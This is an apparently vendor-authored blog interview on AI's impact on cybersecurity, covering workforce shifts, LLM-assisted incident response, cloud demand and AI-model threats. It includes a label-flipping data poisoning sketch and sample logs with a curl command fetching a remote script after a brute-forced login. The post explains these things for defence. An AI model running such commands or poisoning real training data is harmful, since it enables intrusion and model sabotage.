
AI in Cyber Is Here to Stay — How to Weather This Sea Change


“AI’s Impact in Cybersecurity” is a blog series based on interviews with a variety of experts at Palo Alto Networks and Unit 42, whose roles span AI research, product management, consulting, engineering and more. Our objective is to present different viewpoints and predictions on how artificial intelligence is impacting the current threat landscape, how Palo Alto Networks protects itself and its customers, and what this means for the future of cybersecurity.

In this blog, we interviewed Jon Huebner, an extended expertise engineer and consultant for Cortex XSIAM® at Palo Alto Networks, who shared his insights and predictions on the impact of AI in this domain.

Foreseeing a Shifting Job Market and Workflows

One of Huebner’s top predictions is that AI will massively affect the job market and how developers and engineers work, especially within enterprises. As AI becomes more integrated into cybersecurity tools and processes, it will likely lead to significant shifts in the way cybersecurity practitioners operate. Huebner elaborates further:

“It's also going to affect the security of enterprises, of how people use them, how people share their data. Both good and bad ways. It's going to affect productivity in a massive way. A lot of these cloud services will also go through some changes because a lot of that compute power needs to be purchased. It needs to run on a lot of resources. It gets warm, it's a great space heater, and then it's also going to start to impact if companies are hosting their own local LLMs for security, for fine-tuning reasons, and how they're going to be training their own models.”

One of the primary ways AI is projected to transform cybersecurity is by automating many of the repetitive and time-consuming tasks currently performed by humans, such as log analysis and incident response. By automating these tasks, AI will allow cybersecurity practitioners to focus on more strategic and complex work, such as developing new security architectures and conducting forensic investigations.

ISC², the International Information System Security Certification Consortium (a nonprofit organization that specializes in training and certifications for cybersecurity professionals), surveyed cybersecurity professionals worldwide to understand the impact of emerging technologies, including AI, on their roles and responsibilities.

Their 2022 Cybersecurity Workforce Study found that while AI is seen as a valuable tool for improving cybersecurity, many professionals are concerned about its potential for malicious use and about the new skills and knowledge needed to work effectively with these systems. Practitioners will need to understand how AI systems work, how to interpret their outputs, and how to ensure they operate effectively and ethically. This may require cybersecurity professionals to develop expertise in adjacent areas, such as machine learning, data science and ethics, as the technology matures.

Another potential shift in job roles and responsibilities may occur as AI takes over certain tasks, freeing up cybersecurity professionals to focus on more strategic initiatives. For example, as AI improves in its ability to detect and respond to threats, cybersecurity analysts may spend more time on proactive measures, such as threat hunting and risk assessment.

Huebner also highlighted the potential implications of AI on enterprise security and data sharing practices, noting, "It's also going to affect the security of enterprises, of how people use them, how people share their data. Both good and bad ways." The integration of AI into cybersecurity systems could enhance security measures, but it also opens up new avenues for potential misuse and vulnerabilities:

  • AI-Powered Cyberattacks
    • Adversarial AI can be used to automate and scale cyberattacks, making them more difficult to detect and defend against.
    • Attackers can leverage AI to identify and exploit vulnerabilities in systems and networks more efficiently.
    • AI-generated phishing emails and social engineering attacks can be more convincing and harder for humans and traditional security systems to identify.
  • Poisoning and Evasion of AI Models
    • Attackers can manipulate the training data of AI models, leading to incorrect classifications or behaviors (data poisoning attacks); a brief sketch of this follows the list.
    • Adversarial examples can be crafted to deceive AI models and evade detection, compromising the integrity of AI-based security systems.
  • Lack of Transparency and Explainability
    • The opaque nature of some AI models, particularly deep learning systems, can make it difficult to understand how they arrive at decisions, leading to potential biases or errors that could be exploited.
    • The lack of explainability in AI-driven security systems can make it challenging to audit and trust their decisions.
  • Insider Threats and Misuse of AI Tools
    • Insiders with access to AI-powered security tools could misuse them for malicious purposes, such as espionage, sabotage or data theft.
    • Insider knowledge of AI systems could be used to manipulate or bypass security measures.
  • Privacy and Data Protection Concerns
    • AI-driven security systems often require vast amounts of data for training and operation, raising concerns about data privacy and potential breaches.
    • The collection and storage of sensitive data for AI-based security could create new targets for attackers.
  • Overreliance on AI and Automation
    • Organizations may become overly dependent on AI-driven security solutions, leading to a false sense of security and potentially overlooking human expertise and intuition.
    • Overreliance on automation could lead to delayed or ineffective responses to novel or complex threats that require human intervention.
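To make the poisoning risk concrete, here is a minimal sketch (using scikit-learn on synthetic data, purely for illustration) of how flipping even a modest fraction of training labels degrades a classifier. Real-world poisoning attacks are more targeted, but the underlying mechanism is the same:

```python
# Minimal data poisoning sketch: flipping a fraction of training labels
# degrades the resulting classifier. Synthetic data; illustrative only.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
X, y = make_classification(n_samples=2000, n_features=20, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.5, random_state=0
)

def accuracy_with_poisoning(flip_fraction):
    """Train on labels where flip_fraction of them have been flipped."""
    y_poisoned = y_train.copy()
    n_flip = int(flip_fraction * len(y_poisoned))
    idx = rng.choice(len(y_poisoned), size=n_flip, replace=False)
    y_poisoned[idx] = 1 - y_poisoned[idx]  # flip the binary labels
    model = LogisticRegression(max_iter=1000).fit(X_train, y_poisoned)
    return model.score(X_test, y_test)  # evaluate on clean test data

for frac in (0.0, 0.1, 0.3):
    print(f"{frac:.0%} labels poisoned -> accuracy {accuracy_with_poisoning(frac):.3f}")
```

Running it shows test accuracy falling as the poisoned fraction grows, which is why the rigorous validation of training data discussed below matters.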

To mitigate these risks, it is crucial for organizations to adopt a holistic approach to AI-driven cybersecurity. This includes rigorous testing and validation of AI models, regular audits and updates, as well as maintaining human oversight and intervention capabilities. Transparency, explainability and ethical considerations should be prioritized in the development and deployment of AI-based security systems.

LLMs Can Do Some Heavy Lifting

Productivity is another area where Huebner expects AI to have a profound impact. He predicts, "Productivity is going to improve as these LLMs help out." Large language models (LLMs) and other AI technologies are poised to streamline processes, augment human capabilities, and boost overall productivity in various sectors, including cybersecurity.

LLMs are becoming increasingly valuable tools for cybersecurity professionals, particularly in the context of incident response. When a cyberattack occurs, defenders often face the challenge of quickly piecing together information from various sources to understand the scope and nature of the threat. LLMs can greatly assist in this process by rapidly analyzing vast amounts of data, such as system logs, network traffic and threat intelligence feeds.

These AI-powered models can identify relevant patterns, anomalies and indicators of compromise, providing defenders with a clearer picture of the ongoing attack. Moreover, LLMs can translate complex technical data into plain language summaries, making it easier for incident responders to communicate findings and coordinate their efforts effectively.
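As a rough illustration of that workflow, the sketch below asks an LLM to turn raw log lines into a plain-language incident summary. It assumes the OpenAI Python SDK with an API key set in the environment; the model name and log lines are placeholders, and any comparable LLM API could be substituted:

```python
# Sketch: using an LLM to turn raw log lines into a plain-language
# incident summary. Assumes the OpenAI Python SDK and OPENAI_API_KEY
# set in the environment; model name and logs are illustrative.
from openai import OpenAI

client = OpenAI()

log_lines = """
2024-05-01T03:12:44Z sshd[2201]: Failed password for root from 203.0.113.7
2024-05-01T03:12:46Z sshd[2203]: Failed password for root from 203.0.113.7
2024-05-01T03:13:01Z sshd[2207]: Accepted password for admin from 203.0.113.7
2024-05-01T03:14:22Z sudo: admin : COMMAND=/usr/bin/curl http://203.0.113.9/x.sh
"""

response = client.chat.completions.create(
    model="gpt-4o-mini",  # placeholder; use whichever model is available
    messages=[
        {"role": "system",
         "content": "You are an incident response assistant. Summarize the "
                    "logs in plain language and list indicators of compromise."},
        {"role": "user", "content": log_lines},
    ],
)
print(response.choices[0].message.content)
```

In practice, sensitive logs would need redaction or a locally hosted model, which echoes Huebner's point about enterprises hosting their own LLMs for security reasons.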

The Impact of AI on Cloud Computing Infrastructure and Services

Further in the conversation, Huebner touched upon the impact of AI on cloud services, stating, "A lot of these cloud services will also go through some changes because a lot of that compute power needs to be purchased. It needs to run on a lot of resources."

The increasing demand for computational resources to power AI models and systems could drive changes in cloud service offerings and pricing models. As AI becomes more integral to various industries and applications, the need for robust, scalable and cost-effective computing infrastructure will continue to grow. To meet this demand, cloud service providers are likely to develop more specialized AI-focused offerings:

  • AI-Optimized Hardware – Cloud providers may invest in hardware specifically designed to accelerate AI workloads, such as GPUs, TPUs and FPGAs, to provide better performance and efficiency for AI models.
  • Pre-Trained Models and AI Services – Providers may offer a wider range of pretrained AI models and APIs, allowing businesses to easily integrate AI capabilities into their applications without the need for extensive in-house expertise or infrastructure.
  • Hybrid and Edge Computing Solutions – To address latency and data privacy concerns, cloud providers may expand their hybrid and edge computing offerings, enabling AI workloads to be processed closer to the data source.
  • Flexible Pricing Models – As AI workloads can be computationally intensive and vary in resource requirements, cloud providers may introduce more flexible and granular pricing models, such as serverless computing and pay-per-use options, to help businesses optimize costs based on their specific needs (a quick break-even sketch follows this list).
  • Collaboration and Data Sharing Platforms – Cloud providers may develop secure platforms that facilitate collaboration and data sharing among organizations, researchers and developers working on AI projects, fostering innovation and accelerating progress in the field.
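To illustrate the pricing trade-off in that flexible-pricing bullet, here is a back-of-the-envelope sketch comparing hypothetical on-demand and reserved GPU rates; all figures are invented placeholders, not any provider's actual prices:

```python
# Back-of-the-envelope: at what utilization does a reserved GPU instance
# beat pay-per-use? All prices are hypothetical placeholders.
ON_DEMAND_PER_HOUR = 4.00      # hypothetical on-demand GPU rate ($/hr)
RESERVED_PER_MONTH = 1500.00   # hypothetical flat monthly reservation ($)
HOURS_PER_MONTH = 730          # average hours in a month

break_even_hours = RESERVED_PER_MONTH / ON_DEMAND_PER_HOUR
print(f"Reservation wins above {break_even_hours:.0f} hrs/month "
      f"({break_even_hours / HOURS_PER_MONTH:.0%} utilization)")

for hours in (100, 300, 500):
    on_demand_cost = hours * ON_DEMAND_PER_HOUR
    print(f"{hours:>4} hrs: on-demand ${on_demand_cost:,.0f} "
          f"vs reserved ${RESERVED_PER_MONTH:,.0f}")
```

At these made-up rates, a reservation only pays off above roughly half-time utilization, which is exactly the kind of calculation that more granular pricing models are meant to simplify.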

Enhancing Detection of Custom Attacks and Ensuring Responsible Implementation

Addressing the application of AI in cybersecurity, Huebner acknowledged the limitations of current approaches: "A lot of people want it to be that magic black box that is just going to spit out, ‘Hey, this is an alert based off of these log sources,’ but I don't think that's fully accurate at this time." He emphasized that AI is currently focused on grouping and finding similarities between security events, optimizing analyst workflows, and reducing workloads.

Looking ahead, Huebner envisioned AI enabling better detections and more customized solutions. "As we get more data, as we find more use cases for these AIs and LLMs, we're going to start to find new ways for cybersecurity to take off," he predicted. When it comes to specific threats, Huebner believes AI-powered systems will be particularly effective at detecting and preventing tailored and custom attacks. He explains:

"I think a lot of them are going to be more tailored and custom attacks. We're seeing a lot more attackers using AIs, but defensively, these systems are able to detect when it's a more custom attack, and flag it and raise the severity, and make sure it's more seen and more visible, and handled accordingly."

Spy Vs. Spy

Huebner also acknowledged the possibility of attackers using AI against one another, creating a "battle" over control and code theft, stating:

"We've actually seen some of that just starting already as well. Some of these codes are kind of… poisoning other models. They're poisoning other attackers. They're trying to ensure that they're the only ones that create, generate and use the code that they create, and then poison everyone else's model. So they're getting something different.”

To protect AI models from adversarial attacks and evasion techniques, Huebner underscored the importance of a robust security posture and defense-in-depth approach:

"Having the right security, the right security posture and then defense in depth – it's pretty much a lot of those products are out there in the security market. A lot of the security is there. It's really doing that security in depth and having a solid cybersecurity group or team on your side that understands what these attacks could be."

Huebner also discussed key performance metrics for evaluating the effectiveness of AI-powered security solutions, highlighting mean time to respond (MTTR) and the duration of open incidents as crucial factors. He also pointed to analyst productivity, false positives and wasted time as important measures, noting that these metrics may vary across organizations due to specific nuances and workflows.
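As a simple illustration of the metrics Huebner mentions, the sketch below computes MTTR and a false positive rate from a handful of incident records; the record format and values are invented for the example:

```python
# Sketch: computing MTTR and false positive rate from incident records.
# The record format and data are invented for illustration; in a real
# deployment these would come from the SOC's case management system.
from datetime import datetime, timedelta

incidents = [
    {"opened": datetime(2024, 5, 1, 9, 0),  "resolved": datetime(2024, 5, 1, 10, 30), "false_positive": False},
    {"opened": datetime(2024, 5, 1, 11, 0), "resolved": datetime(2024, 5, 1, 11, 20), "false_positive": True},
    {"opened": datetime(2024, 5, 2, 14, 0), "resolved": datetime(2024, 5, 2, 18, 0),  "false_positive": False},
]

# Mean time to respond: average of (resolved - opened) across incidents.
response_times = [i["resolved"] - i["opened"] for i in incidents]
mttr = sum(response_times, timedelta()) / len(response_times)

# Fraction of incidents that turned out to be false positives.
fp_rate = sum(i["false_positive"] for i in incidents) / len(incidents)

print(f"MTTR: {mttr}")
print(f"False positive rate: {fp_rate:.0%}")
```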

Lastly, Huebner stressed the significance of proper training and engineering processes to ensure AI models are implemented responsibly and transparently in security systems: "I believe a lot of this is going to come down to training and your engineering team; how they're building their things and how they're doing it. It's coming and it would really need to be a process and workflow that's built from the ground up." He emphasized the need for rigorous data verification, tailored models and well-defined processes.

In conclusion, Huebner's predictions and insights underscore the transformative potential of AI in cybersecurity, while also highlighting the challenges and considerations that security practitioners must address. As AI continues to advance, staying vigilant, adapting defenses and fostering responsible implementation will be paramount in navigating the evolving threat landscape.

Curious to Learn More? Get an AI Security Assessment

Visit the Unit 42® AI Security Assessment. Empower yourself to adopt generative AI confidently across employee usage and AI application development with our threat intelligence and AI expertise.
